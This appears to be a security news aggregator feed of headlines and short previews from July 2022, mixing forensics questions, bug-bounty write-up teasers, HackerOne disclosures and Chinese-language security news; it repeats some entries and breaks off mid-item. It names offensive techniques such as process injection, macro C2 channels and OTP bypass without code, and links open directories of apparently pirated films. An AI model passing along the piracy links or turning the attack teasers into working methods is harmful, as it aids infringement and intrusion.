    On the heels of my last blog post on this topic, I had a couple of thoughts and insights that I wanted to research a bit, and then address. I wanted to take a look at ways that the StartupApproved\Run key might be impacted, so I started by grabbing the contents of that key based on what we saw from the previous post, which are illustrated in figure 1. Fig 1: StartupApproved\Run key contents Then, I captured the contents of the Run key, illustrated in figure 2. Fig 2: Run key contents As you can see in figure 2, there appears to be an entry missing, the "com.squirrel.Teams.Teams" value. We know from the previous blog post that this value was disabled on 14 Jul 2021, just over a year ago. I have no idea how that happened, as it wasn't part of an intentional test at the t…
  • Open

    Basic BloodHound query for a single machine
    Hi, I am practicing with some Active Directory labs (hackthebox); I dowloaded stuff with Sharphound and imported into my bloodhound installation. There are about 2k users a 500 computers in thi s lab. Let's say I would like to "start" with a specific computer name and look for best path to compromise such machine, how can I do that? What is the query syntax for search a specific computer name? thankyou submitted by /u/g-simon [link] [comments]
    Can attacker gain access to my private network application through pivoting and/or lateral movement?
    I am using a public wifi network to work on some web development. When I start a nodejs express server at my local machine at port 3000, I can access that website on another device (that is connected to the same public wifi network) by going to the http://(private ip address of nodejs host assigned by public wifi dhcp):3000/index.html , for example. So to prevent this, I had my phone connect to the public wifi network and fired up the built in android hotspot. Then I connected my nodejs host machine to the hotspot to start the express server at port 3000. I could no longer access that website anymore from a different device on the public wifi network because express server was now inside the private network within that public wifi network. I can ping from a device inside the android hotspot private network to a device in the public wifi network. But the device from the public wifi network could not ping devices inside the android hotspot private network. Is there a way for an attacker on that public wifi network to gain access to my android hotspot private network without knowing the SSID passphrase? Could they use some kind of network pivoting technique so that they can access my private html website on port 3000? Using something like ip route add? submitted by /u/Fuzzht1 [link] [comments]
    Practical malware analysis book versions
    Hey guys! I'm looking at getting the practical malware analysis book by Michael Sikorski and Andrew Honig, however there seems to be one published in 2012 and another in 2017. Does anyone know if there's any difference between the 2? I'm thinking maybe one is the ebook and the other paper but content the same. Cheers! submitted by /u/semening [link] [comments]

  • Open

    An Overview of Exploit Dev Course Content
    submitted by /u/PM_ME_YOUR_SHELLCODE [link] [comments]
  • Open

    New.Student.Help
    Hi everyone, I’m a student new to cyber forensics. I have read up about file carving and hex carving but was wondering how the two is related. Is hex carving considered file carving? Or maybe a subset of file carving? Also, given a situation where you have to search a company’s file system to scrape all the images in a word document, how best would you approach this? Can hex carving or file carving be considered in this situation and if so, which is better? Thank you submitted by /u/EricaHellscythe [link] [comments]
    Mem dump with malware
    Does anyone know where I can get my hands on memory dump files with live malware on it? I tried running TheZoo on a VM, but I'm having trouble getting malware to detonate other than ransomware. I figured someone might know where I can get a .dmp file that already has the malware in it. Thank you! submitted by /u/DeadBirdRugby [link] [comments]
    New to Forensics, Drop some Forensics tools/training content
    I tried Autopsy and Volatility at a basic level, what else should I go for? submitted by /u/ItsMeTheBatman [link] [comments]
    When does SANS eat itself
    Most SANS DFIR courses are now $7640 and with the exam fee of $949 they price out at $8589. I have attended multiple SANS events and currently hold two GIAC certs so I know the quality of the classes BUT... what is the tipping point? Where getting close to 10K for a one week class. At some point it becomes unsustainable for most organizations. The DFIR training area seems ripe for disruption. Why isn't there any competition offering a similar product at a much better price point? submitted by /u/7174n6 [link] [comments]
  • Open

    password reset No Rate Limiting
    hey gusy my name RISHI NIKAM i am Security Researcher and bug bounty hunter Continue reading on Medium »
    First Bug Bounty from DOS: Taking the service down
    Hello friends, This is Faique, a security researcher & an ethical hacker from India, and this is a journey to my first bug bounty. Continue reading on Medium »
    CRLF to Account takeover (chaining bugs)
    Hi, everyone Continue reading on Medium »
    Authorization token leak from verify email endpoint
    While testing a website I found that the verify email endpoint was leaking the authorization tokens of any verified users by just passing… Continue reading on Medium »
    Local File Inclusion (interesting method)
    Hello researchers, This is Captain_hook and I decide to Share An interesting LFI vulnerability That I found In BC’s program. Continue reading on Medium »
    Subdomain takeover and Text injection on a 404 error page-$100 bounty
    Hello everyone! I’m Jeewan Bhatta and I am here with my first hackerone bug write-up. Hope you all are doing great. So now I am gonna tell… Continue reading on Medium »
    Business logic error
    I Can Delete your email, you can’t register on the website Continue reading on Medium »
    Bypass OTP by manipulating response parameters
    In this real life tutorial you will learn about parameter manipulating vulnerability which can make hackers to bypass otp and finally… Continue reading on Medium »
    But hunting from a car on a cheap, mostly,
    Or, how I learned to hate typing on my phone Continue reading on Medium »
  • Open

    What can I do to get hired as a SOC analyst?
    Just passed Security+ and already have Network+, coming from an intelligence analysis background (metadata analysis, creating workflows with Python, threat research and development, etc.) and very serious about getting into network security. What can I do to improve my chances at landing a SOC analyst role? These are the things I'm planning on doing: Practicing SOC skills on letsdefend.io (and possibly also hackthebox and tryhackme) - more interested in blue team at the moment though Building up my homelab (just ordered a modem and better router to replace my ISP-provided gear) and potentially setting up a syslog server and/or putting freeradius on my Pi (definitely overkill for a home network but it's to learn) 16 hour SOC core skills course with Antisyphon/Black Hills Security (this week!) What else can be doing aside from the obvious (reading up about CVEs, cyber news, etc.) to land this SOC gig? Get another cert? CySA+? Linux+? GSEC? GSOC? (I can get reimbursed for some of the costs but there are expensive as heck). Thanks! submitted by /u/WLANtasticBeasts [link] [comments]
    Blue team bug bounty equivalent?
    Just wondering if there is some program like bug bounties but for blue team professionals. Edit: The characteristics of the bug bounty ideas such as doable on free time, accessible any time and earns you money. Idk what else to add but I think you get the idea. submitted by /u/Chroll-On [link] [comments]
  • Open

    How Windows Processes Work - CreateProcess Workflow (Part 2)
    submitted by /u/sciencestudent99 [link] [comments]
  • Open

    MS-Interloper: On the Subject of Malicious MSIs
    submitted by /u/dmchell [link] [comments]
    Process Injection using QueueUserAPC Technique in Windows
    submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-07-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Can use the Reddit android app as usual even though revoking the access of it from reddit.com
    Reddit disclosed a bug submitted by sateeshn: https://hackerone.com/reports/1632186
  • Open

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Decade old anarchy stuff.
    Again, sorry if it was already posted. https://www.hou2600.org/ftp/textfiles/ submitted by /u/RainyAbrar [link] [comments]
    Random 2010 stuff?
    Don't know if it's already posted. http://www.fricking.ninja/DIY/index/ submitted by /u/RainyAbrar [link] [comments]

  • Open

    Null to Bug: Insecure Direct Object Reference
    What is Null to Bug? Continue reading on Medium »
    How I got CEH (Certified Ethical Hacker) Master Certified. (Resources included)
    Hello Infosec Family. I am Shubham Ghosh, an Information Security Analyst with an experience of 2+ years from Jharkhand, India. This… Continue reading on Medium »
    How I Got My First CVE
    Hello readers, Continue reading on Medium »
    GOOD RECON LEADS TO SENSSITIVE ACCOUNTS
    Hello people i have back with new hacking story !! . so yesterday i was hunting on one of the vdp program let’s consider it xyz.com . so… Continue reading on Medium »
    Ability to login as google staff in Google Cloud Community
    -Gaurav Bhatia (Bug Hunter, CTF Player) Continue reading on Medium »
    How I spammed a Google meet (But for good)
    Hacking isn’t always about account takeover, authentication bypass, or authorization abuse. Sometimes it’s about functionality abuse and… Continue reading on Medium »
    Information Source Code Disclosure Directory .git — MNC Play
    Pada tanggal 15 Oktober 2020 saya menemukan BUG SQL Injection di payment.mncplay.id tetapi tidak ada respons dari pihak MNC Play. Continue reading on Medium »
    Paramspider lead to find SQLI vulnerability
    In this tutorial you will learn how real hackers can find injection vulnerabilities like : Continue reading on Medium »
  • Open

    Huge directory of every skill site you can think of!
    submitted by /u/orphickalon [link] [comments]
  • Open

    What is OSINT? Part — 1
    Do you use social media like Instagram, Facebook, Twitter, or Snapchat? Ahh, I know most of you are using it. Continue reading on Medium »
    War in Ukraine / July 14
    Day 142: Grain in exchange for the lifting of sanctions Continue reading on Medium »
    Holehe Transform using Maltego
    Overview Continue reading on Medium »
  • Open

    Insecure Object Permissions for Guest User leads to access to internal documents!
    IBM disclosed a bug submitted by mocr7: https://hackerone.com/reports/1089583
    Add me email address Authentication bypass
    LinkedIn disclosed a bug submitted by raajeevrathnam: https://hackerone.com/reports/1607645
    POST BASED REFLECTED XSS IN dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1451394
    [h1-2102] shopApps query from the graphql at /users/api returns all existing created apps, including private ones
    Shopify disclosed a bug submitted by inhibitor181: https://hackerone.com/reports/1085332 - Bounty: $1900
  • Open

    What are some must-learn relevant concepts in C?
    Things like pointers, memory management etc? Thanks submitted by /u/UseFit [link] [comments]
    Do you have Microsoft 365 focused security blogs you follow?
    Hey folks, I'm trying to build out my RSS feed I browse each morning when I come in. I'm looking to build out a whole section dedicated to M365 security and was wondering if folks here had any go to blogs they like, either Microsoft or third party? submitted by /u/beagle_bathouse [link] [comments]
    How to parse Linux logs to Graylog?
    Hello, We already forwarded Linux logs to our Graylog syslog server (community version). However, the logs are not parsed. One option is to use extractors, but this approach is kinda manual and time-consuming. Is there any other way to parse the Linux logs properly? Thank you. submitted by /u/sanba06c [link] [comments]
  • Open

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]
  • Open

    SecWiki News 2022-07-15 Review
    攻防演练之域控加固篇 by ourren 攻防演练之域控检测篇 by ourren 火山引擎CWPP(Elkeid) 真实对抗案例分享 by ourren 软件供应链安全风险分析研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-15 Review
    攻防演练之域控加固篇 by ourren 攻防演练之域控检测篇 by ourren 火山引擎CWPP(Elkeid) 真实对抗案例分享 by ourren 软件供应链安全风险分析研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    Digium Phones Under Attack: Insight Into the Web Shell Implant
    We witnessed more than 500,000 unique samples of malicious traffic targeting Digium Asterisk software for VoIP phone devices. The post Digium Phones Under Attack: Insight Into the Web Shell Implant appeared first on Unit 42.
  • Open

    PortSwigginar - 13 July
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the product for those who h
  • Open

    PortSwigginar - 13 July
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the product for those who h
  • Open

    ‍IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview
  • Open

    ‍IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview
  • Open

    ‍IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview
  • Open

    JARM 指纹混淆随机化技术实现
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 基于JARM指纹的C2识别 JARM的工作原理是主动向目标TLS服务器发送10个特殊构造的TLS Client Hello包,以在TLS服务器中提取独特的响应,并捕获TLS Server Hello响应的特定属性,然后以特定的方式对聚合的TLS服务器响应进行...
  • Open

    JARM 指纹混淆随机化技术实现
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 基于JARM指纹的C2识别 JARM的工作原理是主动向目标TLS服务器发送10个特殊构造的TLS Client Hello包,以在TLS服务器中提取独特的响应,并捕获TLS Server Hello响应的特定属性,然后以特定的方式对聚合的TLS服务器响应进行...
  • Open

    微软曝光了苹果系统沙盒逃逸漏洞的细节
    微软公开披露苹果系统应用沙盒访问问题漏洞的技术细节,影响iOS、iPadOS、macOS、tvOS 和 watchOS系统。
    红队实录系列(一)-从 NodeJS 代码审计到内网突破
    此实录起因是公司的一场红蓝对抗实战演习,首先通过内部自研资产平台通过分布式扫描对目标资产进行全端口指纹识别。
    Mantis——迄今为止的最强僵尸网络
    Cloudflare宣布其上个月缓解的破纪录的DDoS攻击源自一个名为Mantis的新僵尸网络。
    遭勒索软件攻击,美190万条医疗记录被泄露
    美国一家收债员专业金融公司 (PFC) 报告了一起数据泄露事件。
    FreeBuf早报 | 万代南梦宫证实遭黑客入侵;智慧工厂未做好网络攻击应对准备
    2022 年 6 月,全国各级网络举报部门受理举报 1498.7 万件,环比下降 2.3%、同比增长 9.8%。
    内网文件如何确保安全传递? | FreeBuf甲方群话题讨论
    企业在通过U盘、网盘等方式,或通过内网私域进行传递文件时,该如何确保其安全性?
    FreeBuf周报 | 超1万家企业遭受钓鱼攻击;多款本田车型存在漏洞,车辆可被远程控制
    各位 FreeBufer 周末好~我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
  • Open

    IDA Plugin to reconstruct .proto files used in the analyzed binary
    submitted by /u/Martypx00 [link] [comments]
    CVE-2022-29593
    submitted by /u/9lyph [link] [comments]
  • Open

    CVE-2022-29593 – Authentication Bypass by Capture Replay (Dingtian-DT-R002)
    Article URL: https://github.com/9lyph/CVE-2022-29593 Comments URL: https://news.ycombinator.com/item?id=32105629 Points: 1 # Comments: 0
  • Open

    Malicious Steganography
    How to inject malicious powershell scripts into an image? Continue reading on Medium »

  • Open

    Healthcare IT: Encrypt PHI Traffic Inside the Network?
    For those of you in healthcare IT, do you encrypt your interface transmissions inside your network? Encryption: External vs. Internal Traffic We'd all agree that unencrypted PHI can't be sent/shouldn't be sent over the internet. All external connections require a VPN or other encryption. For internal traffic, some/many organizations considers encryption as not needed. Instead, they rely on network and server protections to, "implement one or more alternative security measures to accomplish the same purpose." Without encryption, however, the internal network carries a tremendous amount of PHI as plain text. What is your organization doing vs. the below? HIPAA Encryption Requirement If an HIT org does not encrypt PHI, either in-motion or at rest, it must: Document its alternative …
    Side-hustling as VAPT freelancer, any advice? also discussion :)
    Hi everybody. I don't know if this is the right place to talk about these themes but i've seen some (really) older questions around so i think that i'll try to ask here. I'm a young computer engineer (master's) and i'm working for an IT company in the Cyber Security department, my tasks are to look after endpoint protection, firewalls, vpns and so on. I know how to do pentests, I specialized in that in my university and i've partecipated in some real projects, I also aim to acquire some certifications around. Long story short, I think that i'll try in the future to side-hustle by doing penetration tests and vulnerability assestments for $$, my questions are: Do some of you have done something similar? Which could be a good platform, or, what could be some good platforms to start with online? Do you have some advices in general? Do you think that there could be some other security-related side-hustles that could be better economically speaking? (i have to say that i love doing pentests). Hoping for your help, i would like to thank any one of you that wil answer to this port in advance :) submitted by /u/Set-New [link] [comments]
    Does SQL injection require a 'changed' scope in the CVSS score?
    I'm currently going through some vulnerabilities for an advisory and one of my coworkers said that SQL injection always has the scope set to 'changed' when calculating CVSS scores. That doesn't seem right to me since the web application is still the affected host. It also bumps up our CVSS score to look extra scary -- a 9.9 for SQLi that requires low-privileges. Example vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H If the SQL server is on the same host, shouldn't the scope remain unchanged? Thanks! submitted by /u/Reemertastic [link] [comments]
    What’s something less technical and less stressful to transition to coming from pentesting?
    Hi everyone. I’ve been doing pentesting for about 1 - 1.5 years now. I had a very high interest in pursuing a pentesting career about 2-3 years ago and I worked towards that goal by doing a lot of self learning and getting a couple certs (not OSCP, but pentest+ and eJPT). Now that I’ve been working in pentesting for a little while, I’ve realized that this isn’t for me and I want out. I find the stress that comes from performing penetration tests on a weekly basis and having to constantly battle with developers and app team owners is just too much for me. Before pentesting I worked in appsec (both static and dynamic) and before that had a very short stint as a Junior developer coming out of college. So Ive been on the technical side things pretty much my entire career. I find myself now at a place where i want to be less technical. I just want to have a stress free job that’s consistent. Any recommendations on what else I could explore? submitted by /u/anon2user [link] [comments]
    Does configuring a specific SSID create possibilities for additional security controls?
    My team makes use of a shared office space. The owner of the space offers public WiFi without password. It's possible to have our own SSID configured on the WiFi and enforce passwords for getting access. I'm interested to learn what extra security controls we can implement if we have our own SSID. submitted by /u/But-I-Am-a-Robot [link] [comments]
    Is a DNS Query to Coin Mining Domain dangerous?
    Hello, I've received many repeated alerts from Security Onion, which stated that "ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)". The source IP address is from an internal endpoint and the destination IP address is from a DNS server. Is this event dangerous? In my opinion, it did not make any direct connection to the external IP. So, I do not see this event a positive alert. Any advice would be highly appreciated. submitted by /u/sanba06c [link] [comments]
  • Open

    OAUTH Misconfiguration leads to Full Account Takeover
    Hello, you amazing Hackers!! My name is Aditya Singh a Security Researcher from India. in today’s blog, we are going to see OAUTH… Continue reading on Medium »
    Basic Linux skills for bug bounty hunting and ethical hacking (day-2)
    Hello guys, it’s Selim, back here with another interesting article, in the previous article we learn about how a beginner gets into bug… Continue reading on Medium »
    start hacking carrier part 3
    today i ll share a list of bug bounty writ up list and bug bounty checklist that i follow… Continue reading on Medium »
    Easy to find vulnerabilities that might get paid [part-2]
    Hello hackers I am back with another short write-up so this is the second part of easy-to-find vulnerabilities that might get paid so… Continue reading on Medium »
    How I found my first bug
    Hi guys, this is my first post in celebration of my first bug found. Continue reading on Medium »
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on Medium »
    Recon em ASN’s
    Esse artigo visa demonstrar de forma básica o recon em ASN’s. Antes de entrarmos no assunto de recon em ASN’s, é preciso falar de alguns… Continue reading on Medium »
    Beginners Guide to Bug Bounty
    This guide will give you an idea on how to start out in bug bounties if you’re new to the topic. Continue reading on Medium »
    Reset password vulnerability
    In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login. Continue reading on Medium »
  • Open

    Anyone got a practice exam for FOR508 SANS
    Hi guys, ​ doing the 508 exam in 2 weeks and wanted to know if someone has a spare practice exam test for me - if anyone got one, would also pay for it ... PM if possible THX :) submitted by /u/schoeringhumer [link] [comments]
  • Open

    OPEN SOURCE INTELLIGENCE WITH BLACKBIRD
    Information provided in this article is to assist users in scanning their own networks and systems, or networks and systems for which they… Continue reading on Medium »
    War in Ukraine / July 14
    Day 141: Tragedy in Vinnytsia — more than 20 victims Continue reading on Medium »
    The Moonshot Threat Bulletin at a Glance: June 2022
    This blog contains a short excerpt from June’s Moonshot Threat Bulletin. If you would like to access a one month free-trial to the full… Continue reading on Medium »
  • Open

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro (Part 2)
    Hi everyone, in previous blogpost (and video) we showcased how to embed powershell payload inside VBA macro for MS Word, but we were… Continue reading on Medium »
    How Purple Teaming Made Me A Better Blue Teamer
    Purple Team experiences Continue reading on Medium »
    Hashcat 101: Cracking Password Hashes
    Let say you are hacking a Linux box and all you have is a shadow.log like below Continue reading on Medium »
  • Open

    SecWiki News 2022-07-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Understanding and Bypassing Rate Limiting's
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »
  • Open

    Understanding and Bypassing Rate Limiting's
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »
  • Open

    Understanding and Bypassing Rate Limiting's
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »
  • Open

    BGGP3: Crash on the Cob
    submitted by /u/netsecfriends [link] [comments]
    Exploiting Arbitrary Object Instantiations in PHP without Custom Classes
    submitted by /u/albinowax [link] [comments]
    Researching access tokens for fun and knowledge
    submitted by /u/One-Assistance-8552 [link] [comments]
  • Open

    A Discord server for OSINT collaboration?
    submitted by /u/OvertOperator [link] [comments]
  • Open

    FreeBuf早报 | Uniswap 在网络钓鱼攻击中被盗800万美元;PFC承认遭勒索软件攻击
    Uniswap 在网络钓鱼攻击中被盗800万美元;PFC承认遭勒索软件攻击191万患者信息被泄露。
    斗象科技获来自国家信息安全漏洞库(CNNVD)“漏洞通报”业务感谢信!
    不断夯实技术和平台优势,为提升国家网络安全漏洞治理体系和能力贡献力量。
    Java CommonsBeanUtils1 反序列化手写 EXP
    Java CommonsBeanUtils 反序列化,从先不看 yso 的链子,自己尝试寻找漏洞的角度学习。
    赶紧自查,AMD和Intel CPU又曝新漏洞
    苏黎世联邦理工学院研究人员发现了一个影响众多旧 AMD 和 Intel 微处理器的漏洞,可导致基于 Spectre 的推测执行攻击。
    Google Play上的新Android恶意软件安装了300万次
    Google 应用商店上出现了一个新的安卓恶意软件,累计下载次数已经超过 300 万次。
    不降反升,乌克兰网络机构报告第二季度网络攻击激增
    针对乌克兰的网络攻击的频率和数量在今年第二季度激增。
    僵尸网络样本行为分析
    本文简单分析僵尸网络病毒行为,并提出针对性解决方案。
    新勒索软件Lilith出现,已有企业中招
    一个代号为“Lilith”的新勒索软件行动近日出现在网络上,并展开了攻击行动。
    信息安全官齐论剑 |「CIS网络安全创新大会·夏日版」CSO论坛回顾
    未来我国CSO体系将会如何发展,CSO的能力评价指标有哪些,具体岗位职责又有哪些变化等,CSO闭门论坛开展了热烈的分享和讨论。
    联想超70款笔记本电脑被曝新型UEFI固件漏洞
    利用UEFI 固件漏洞的攻击非常危险,能让攻击者在操作系统刚启动时运行恶意软件,甚至在 Windows 内置安全保护被激活之前。
    攻防演练在即,盒子宇宙「重要机密」泄露!
    挖蛙带你一探究竟~
  • Open

    Lazarus 黑客组织使用的 YamaBot 恶意软件分析
    作者:朝長 秀誠 译者:知道创宇404实验室翻译组 原文链接:https://blogs.jpcert.or.jp/en/2022/07/yamabot.html JPCERT/CC正在持续调查Lazarus的活动。2021年,JPCERT/CC在CODE BLUE和HITCON上介绍了其攻击活动。 https://github.com/JPCERTCC/Lazarus-research/ ...
  • Open

    Lazarus 黑客组织使用的 YamaBot 恶意软件分析
    作者:朝長 秀誠 译者:知道创宇404实验室翻译组 原文链接:https://blogs.jpcert.or.jp/en/2022/07/yamabot.html JPCERT/CC正在持续调查Lazarus的活动。2021年,JPCERT/CC在CODE BLUE和HITCON上介绍了其攻击活动。 https://github.com/JPCERTCC/Lazarus-research/ ...
  • Open

    X — A Sexy Horror Story (2022) Film SUB ITA — CB01 Altadefinizione
    guarda X — A Sexy Horror Story (2022) film completo, X — A Sexy Horror Story streaming ita, X — A Sexy Horror Story streaming… Continue reading on Medium »
  • Open

    Cracking Kubernetes Authentication (AuthN) Model
    Part of this post’s contents first appeared in User and workload identities in Kubernetes, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and very friendly to beginners. The version posted here in contrast has a biased focus on the design and implementation, as well as in-depth discussions. Related posts: Cracking Kubernetes Node Proxy (aka kube-proxy) Cracking Kubernetes Network Policy Cracking Kubernetes Authentication (AuthN) Model Cracking Kubernetes RBAC Authorization (AuthZ) Model TL; DR This post digs into the Kubernetes authentication (AuthN) model. Specifically, we’ll start from analyzing the technical requirements of AuthN in Kubernetes then design one for it (assuming it hasn’t had one yet), the final solution has an end-to-end workflow like below: Hop…

  • Open

    Vulnerability to unlock and remotely start virtually all models of Honda cars
    Article URL: https://twitter.com/wugeej/status/1547043442488147969 Comments URL: https://news.ycombinator.com/item?id=32090211 Points: 2 # Comments: 0
    A macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706
    Article URL: https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Comments URL: https://news.ycombinator.com/item?id=32088196 Points: 8 # Comments: 0
    OpenSSL Heap Memory Corruption Vulnerability Fixed
    Article URL: https://thenewstack.io/openssl-heap-memory-corruption-vulnerability-fixed/ Comments URL: https://news.ycombinator.com/item?id=32087941 Points: 1 # Comments: 0
  • Open

    Introducing Decompiler Explorer (🐶⚡️)
    submitted by /u/Psifertex [link] [comments]
    CVE-2022-29885 - Apache Tomcat Cluster Service DoS
    submitted by /u/voidz0r [link] [comments]
    Dealing with Failure: Failure Escalation Policy in CLR Hosts
    submitted by /u/jeandrew [link] [comments]
    Attacking Active Directory: 0 to 0.9
    submitted by /u/CyberMasterV [link] [comments]
    How Windows Processes Work - Creation, APIs, Data Structures (Part 1)
    submitted by /u/sciencestudent99 [link] [comments]
    This Salesforce Tableau Server XSS vulnerability will not get a CVE attributed. Here is the PoC and the fixed versions.
    submitted by /u/obilodeau [link] [comments]
    From Prototype Pollution to Remote Code Execution in Blitz.js
    submitted by /u/SonarPaul [link] [comments]
    Affinis - Subdomain Discovery Through RNN (Recurrent Neural Network)
    submitted by /u/jibblz [link] [comments]
    The Long Tail of Log4Shell Exploitation
    submitted by /u/scopedsecurity [link] [comments]
    Introducing Pretender: Your New Sidekick for Relaying Attacks
    submitted by /u/RedTeamPentesting [link] [comments]
    CVE-2022-32223 Discovery: DLL Hijacking via npm CLI
    submitted by /u/mkatch [link] [comments]
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP ($6,000 Bug Bounty)
    submitted by /u/numanturle [link] [comments]
    Rolling PWN Attack Affecting Honda Vehicles
    submitted by /u/0xdea [link] [comments]
    Executing Arbitrary Code Over a Phone Line Thanks to the XBAND Video Game Modem
    submitted by /u/vincelasal [link] [comments]
  • Open

    【安全通报】2022年7月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年7月 安全补丁,修复了针对 36 款微软产品的 84 个漏洞,其中52个权限提升漏洞,4个安全功能绕过漏洞,12个远程代码执行漏洞,11个信息泄露...
  • Open

    【安全通报】2022年7月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年7月 安全补丁,修复了针对 36 款微软产品的 84 个漏洞,其中52个权限提升漏洞,4个安全功能绕过漏洞,12个远程代码执行漏洞,11个信息泄露...
  • Open

    Four more Movies/Series ODs (Lots of stuff)
    http://www.moviefyy.com/Film/ ​ http://192.95.30.30/lol/ ​ http://103.222.20.150/ftpdata/ ​ http://167.114.174.132:9092/ submitted by /u/LordPato [link] [comments]
    Two Huge Movie/Series Open Directories
    http://ir2.papionvod.ir/Media/ https://dl3.3rver.org/ submitted by /u/LordPato [link] [comments]
    Photos of Idaho things: Idaho state fair, Idaho potatoes, Idaho Mormons, Idaho vacuum cleaner museum....
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    A macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706
    Article URL: https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Comments URL: https://news.ycombinator.com/item?id=32088196 Points: 8 # Comments: 0
    CVE-2022-32224: Possible RCE escalation bug in SerializedColumns in ActiveRecord
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-32224-possible-rce-escalation-bug-with-serialized-columns-in-active-record/81017 Comments URL: https://news.ycombinator.com/item?id=32082974 Points: 1 # Comments: 0
  • Open

    Cyber Security Kill Chain : Explained
    A hacker only needs one attack vector to succeed. Your responsibility is to identify these potential attack vectors as “your security is… Continue reading on Medium »
  • Open

    OTP Bypass via Response Manipulation
    Hello Readers, I am Tariq Rafiq Kehar , a bug hunter. Continue reading on Medium »
    Useful Offensive Snippets
    I will update this post regularly, I am starting with a few of my most commonly used snippets. Continue reading on Medium »
    How to study Cyber Security on your own for free?
    This was always the question in my mind from the very beginning and after studying for months and doing deep analysis and research, I came… Continue reading on Medium »
    How to find Origin IP
    வணக்கம் மக்களே!!! I’m Boopathi. In this blog, I’m gonna discuss about Origin IP Continue reading on Medium »
    COLIZEUM Bug-Bounty Program
    Report a bug and get Whitelisted for Colizeum ELITE NFT sale, this is an opportunity to get hands-on ELITE NFT before anybody else does. Continue reading on Medium »
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP
    During my early stages of employment at Gais Cyber Security in 2021, my manager had reached out to me over the phone and said with… Continue reading on Medium »
  • Open

    War in Ukraine / July 12
    Day 140: The question of the day: will it be possible to agree on the export of Ukrainian grain by sea Continue reading on Medium »
  • Open

    SecWiki News 2022-07-13 Review
    云沙箱流量识别技术剖析 by ourren 基于开源工具实现软件成分分析SCA by ourren Kscan: 一款纯go开发的全方位扫描器 by ourren 疑似PurpleFox多手段持续实施攻击活动 by ourren 了解C4ISR,漂亮国在信息化作战还是要借鉴 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-13 Review
    云沙箱流量识别技术剖析 by ourren 基于开源工具实现软件成分分析SCA by ourren Kscan: 一款纯go开发的全方位扫描器 by ourren 疑似PurpleFox多手段持续实施攻击活动 by ourren 了解C4ISR,漂亮国在信息化作战还是要借鉴 by ourren 更多最新文章,请访问SecWiki
  • Open

    Stored XSS for Grafana dashboard URL
